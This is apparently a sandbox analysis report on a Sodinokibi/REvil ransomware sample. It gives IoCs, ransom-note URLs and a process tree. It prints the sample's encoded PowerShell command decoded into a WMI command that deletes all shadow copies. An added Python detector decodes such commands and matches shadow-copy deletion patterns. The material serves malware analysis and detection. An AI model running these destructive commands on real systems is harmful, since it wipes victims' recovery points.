Analysis
-
max time kernel: 152s
max time network: 189s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 16-06-2022 03:40
Static task: static1
Behavioral task: behavioral1
  Sample: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
  Resource: win10v2004-20220414-en
General
-
Target: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
Size: 164KB
MD5: bf31b07ed28a86bd34223675a8496fdb
SHA1: ba660ebd94e582847e8b13320214c0ffd0811d1c
SHA256: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50
SHA512: 97777ccf1a9b6f9952163afffb07eca233a6e074e02cb3f25bcc18fe5ef3a60f3b15ede43d216adea2f7a5bc0607cde244525c6770b99e32d9e10ea4745707c2
Malware Config
-
Extracted from: C:\100om-readme.txt
Family: sodinokibi
URLs:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/736D09ACDCF968F3
http://decryptor.top/736D09ACDCF968F3
Signatures
-
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality. The ransom note name (100om-readme.txt) and the appended extension (.100om) in the IoCs below are the per-victim values for this run.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: all IoCs below were produced by 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
description  | ioc
File renamed | C:\Users\Admin\Pictures\BackupClose.png => \??\c:\users\admin\pictures\BackupClose.png.100om
File renamed | C:\Users\Admin\Pictures\DebugProtect.crw => \??\c:\users\admin\pictures\DebugProtect.crw.100om
File renamed | C:\Users\Admin\Pictures\ResumeGroup.png => \??\c:\users\admin\pictures\ResumeGroup.png.100om
File renamed | C:\Users\Admin\Pictures\SkipConvertFrom.crw => \??\c:\users\admin\pictures\SkipConvertFrom.crw.100om
File renamed | C:\Users\Admin\Pictures\WriteRestart.crw => \??\c:\users\admin\pictures\WriteRestart.crw.100om
File renamed | C:\Users\Admin\Pictures\UnprotectProtect.png => \??\c:\users\admin\pictures\UnprotectProtect.png.100om
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: all IoCs below were produced by 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
description            | ioc
File opened (read-only) | \??\S:
File opened (read-only) | \??\V:
File opened (read-only) | \??\W:
File opened (read-only) | \??\Z:
File opened (read-only) | \??\L:
File opened (read-only) | \??\P:
File opened (read-only) | \??\Q:
File opened (read-only) | \??\K:
File opened (read-only) | \??\R:
File opened (read-only) | \??\D:
File opened (read-only) | \??\A:
File opened (read-only) | \??\E:
File opened (read-only) | \??\G:
File opened (read-only) | \??\Y:
File opened (read-only) | \??\H:
File opened (read-only) | \??\M:
File opened (read-only) | \??\N:
File opened (read-only) | \??\J:
File opened (read-only) | \??\O:
File opened (read-only) | \??\T:
File opened (read-only) | \??\U:
File opened (read-only) | \??\X:
File opened (read-only) | \??\B:
File opened (read-only) | \??\F:
File opened (read-only) | \??\I:
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
description     | ioc
Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\mg38980z.bmp"
-
Drops file in Program Files directory 30 IoCs
Processes: all IoCs below were produced by 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
description                  | ioc
File created                 | \??\c:\program files (x86)\100om-readme.txt
File opened for modification | \??\c:\program files\LimitHide.vssm
File opened for modification | \??\c:\program files\MoveGrant.M2TS
File opened for modification | \??\c:\program files\StepEdit.mpv2
File opened for modification | \??\c:\program files\ConvertRevoke.jpeg
File opened for modification | \??\c:\program files\UninstallPop.wpl
File opened for modification | \??\c:\program files\ConvertFromTest.potx
File opened for modification | \??\c:\program files\LockPop.bmp
File opened for modification | \??\c:\program files\PopExit.pub
File opened for modification | \??\c:\program files\GroupSearch.emz
File opened for modification | \??\c:\program files\CompleteResume.DVR-MS
File opened for modification | \??\c:\program files\CopyRemove.potx
File opened for modification | \??\c:\program files\MoveConvertTo.js
File opened for modification | \??\c:\program files\NewTrace.dxf
File opened for modification | \??\c:\program files\PingUpdate.vst
File opened for modification | \??\c:\program files\MoveJoin.pcx
File opened for modification | \??\c:\program files\RestartSubmit.gif
File opened for modification | \??\c:\program files\ResumeConfirm.WTV
File created                 | \??\c:\program files\100om-readme.txt
File opened for modification | \??\c:\program files\CompressFormat.jpe
File opened for modification | \??\c:\program files\CopyClear.rar
File opened for modification | \??\c:\program files\DismountRead.htm
File opened for modification | \??\c:\program files\GetResolve.pptx
File opened for modification | \??\c:\program files\UndoSend.wma
File opened for modification | \??\c:\program files\EnableRestart.eps
File opened for modification | \??\c:\program files\RedoSubmit.pptx
File opened for modification | \??\c:\program files\TraceRevoke.wvx
File opened for modification | \??\c:\program files\ReceiveMerge.3gp
File opened for modification | \??\c:\program files\StartEdit.rle
File opened for modification | \??\c:\program files\TestRestore.wm
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe, powershell.exe
pid  | process
1440 | 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
1440 | 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
4348 | powershell.exe
4348 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes: powershell.exe, vssvc.exe
description               | pid  | process
Token: SeDebugPrivilege   | 4348 | powershell.exe
Token: SeBackupPrivilege  | 2368 | vssvc.exe
Token: SeRestorePrivilege | 2368 | vssvc.exe
Token: SeAuditPrivilege   | 2368 | vssvc.exe
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes: 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe
description                     | pid  | process                                                               | target process
PID 1440 wrote to memory of 4348 | 1440 | 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe | powershell.exe
PID 1440 wrote to memory of 4348 | 1440 | 27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe | powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe (PID 1440, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50.exe"
  - Modifies extensions of user files
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4348, depth 2, child of PID 1440)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    The -e argument is the base64 encoding of the UTF-16LE script text; it decodes to:
    Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    (enumerates every volume shadow copy through WMI and deletes it, removing the local restore points before or during encryption)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exe (depth 1)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
-
C:\Windows\system32\vssvc.exe (PID 2368, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
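The only command line in this report that carries the shadow-copy deletion is base64-encoded, so a detection that greps for `vssadmin` or `Win32_ShadowCopy` in raw process command lines misses it. The following is an added example (my code, not part of the sandbox output or of the REvil sample) that decodes PowerShell `-EncodedCommand` arguments the way powershell.exe does (base64 of UTF-16LE text) and then runs a small set of shadow-copy tampering patterns over the decoded script. The encoded string is copied from the process tree above; the other command lines in `SAMPLE_COMMAND_LINES`, and the pattern list itself, are constructed for this example and are not a signature from any vendor. Deleting shadow copies through WMI goes through the Volume Shadow Copy service, which is consistent with vssvc.exe appearing in the process list with SeBackupPrivilege and SeRestorePrivilege.

```python
"""Decode PowerShell -EncodedCommand payloads and flag shadow-copy deletion.

Added example for this sandbox report; not code from the report or the sample.
"""
import base64
import re
import shlex

# The powershell.exe -e argument exactly as recorded in the process tree above.
REPORT_ENCODED_COMMAND = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMA"
    "bwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUA"
    "bABlAHQAZQAoACkAOwB9AA=="
)

# Constructed pattern list for this example (assumption: these are the
# shadow-copy tampering idioms a practitioner would start with).
SHADOW_COPY_PATTERNS = [
    re.compile(r"win32_shadowcopy", re.I),               # WMI class used here
    re.compile(r"\.Delete\(\)", re.I),                   # WMI instance deletion
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]


def decode_encoded_command(b64: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le")


def _is_encoded_flag(token: str) -> bool:
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand
    # (-e, -ec, -enc, ...); -ExecutionPolicy does not match this prefix test.
    if not token.startswith(("-", "/")):
        return False
    name = token.lstrip("-/").lower()
    return name.startswith("e") and "encodedcommand".startswith(name)


def extract_script(cmdline: str) -> str:
    """Return the script text a powershell command line would actually run.

    If an -EncodedCommand style flag is present its argument is decoded;
    otherwise the raw command line is returned unchanged.
    """
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = cmdline.split()
    for i, tok in enumerate(argv[:-1]):
        if _is_encoded_flag(tok):
            try:
                return decode_encoded_command(argv[i + 1])
            except (ValueError, UnicodeDecodeError):
                return cmdline  # not valid base64/UTF-16LE: fall back to raw text
    return cmdline


def classify(cmdline: str) -> dict:
    """Decode (if needed) and report which shadow-copy patterns matched."""
    script = extract_script(cmdline)
    hits = [p.pattern for p in SHADOW_COPY_PATTERNS if p.search(script)]
    return {"script": script, "shadow_copy_tamper": bool(hits), "matches": hits}


# Constructed sample command lines: the first is the real one from this report,
# the second is a classic vssadmin variant, the third is benign administration.
SAMPLE_COMMAND_LINES = [
    "powershell -e " + REPORT_ENCODED_COMMAND,
    "vssadmin.exe delete shadows /all /quiet",
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]


def scan(cmdlines=SAMPLE_COMMAND_LINES) -> list:
    """Return only the command lines that tamper with shadow copies."""
    return [c for c in cmdlines if classify(c)["shadow_copy_tamper"]]


if __name__ == "__main__":
    for c in SAMPLE_COMMAND_LINES:
        r = classify(c)
        print(f"{'ALERT' if r['shadow_copy_tamper'] else 'ok   '} {r['script']}")
```

The point of decoding before matching is that the encoded form changes with every whitespace or casing tweak of the script, while the decoded text still contains the stable `Win32_ShadowCopy` and `.Delete()` tokens; a detection keyed on the raw base64 would be trivially evaded.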
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
memory/4348-130-0x0000000000000000-mapping.dmp
memory/4348-131-0x000001A64A310000-0x000001A64A332000-memory.dmp (Filesize 136KB)
memory/4348-132-0x00007FFF9A210000-0x00007FFF9ACD1000-memory.dmp (Filesize 10.8MB)
memory/4348-133-0x00007FFF9A210000-0x00007FFF9ACD1000-memory.dmp (Filesize 10.8MB)